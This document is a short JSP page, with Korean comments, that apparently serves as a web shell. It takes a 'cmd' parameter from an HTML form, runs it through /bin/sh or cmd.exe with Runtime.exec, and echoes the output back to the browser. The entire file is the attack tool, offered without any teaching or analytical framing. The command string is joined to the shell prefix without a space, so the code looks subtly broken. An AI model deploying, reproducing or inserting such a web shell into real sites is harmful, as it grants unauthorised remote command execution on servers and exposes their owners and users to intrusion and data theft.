<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.0">
<jsp:directive.page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.io.*"/>
<jsp:scriptlet><![CDATA[
    String cmd = request.getParameter("cmd");
    String now_page = request.getServletPath();
    Process ps = null;
    BufferedReader br = null;
    String line = "";
    String result = "";
    String os = System.getProperty("os.name").toLowerCase();
    String shell = "";

    try {
        if(os.indexOf("win") == -1) {
            // Windows가 아닐 경우
            shell = "/bin/sh -c";
        } else {
            shell = "cmd.exe /c";
        }

        if(cmd != null) {
            ps = Runtime.getRuntime().exec(shell + cmd);
            // 바이트 스트림 > 문자 스트림 > 버퍼 저장
            br = new BufferedReader(new InputStreamReader(ps.getInputStream()));

            while((line = br.readLine()) != null) {
                result += line + "<br>";
            }
            ps.destroy();
        }
    } finally {
        if(br != null) br.close();
    }

    String content1 = "<form action=\"" + now_page + "\" method=\"POST\">";
    content1 += "<input type=\"text\" name=\"cmd\">";
    content1 += "<input type=\"submit\" value=\"EXECUTE\">";
    content1 += "</form><hr>";
    out.println(content1);

    if(cmd != null) {
        String content2 = "<table style=\"border: 1px solid black; background-color: black\">";
        content2 += "<tr><td style=\"color: white; font-size: 12px\">";
        content2 += result;
        content2 += "</td></tr></table>";
        out.println(content2);
    }
]]>
</jsp:scriptlet>
</jsp:root>
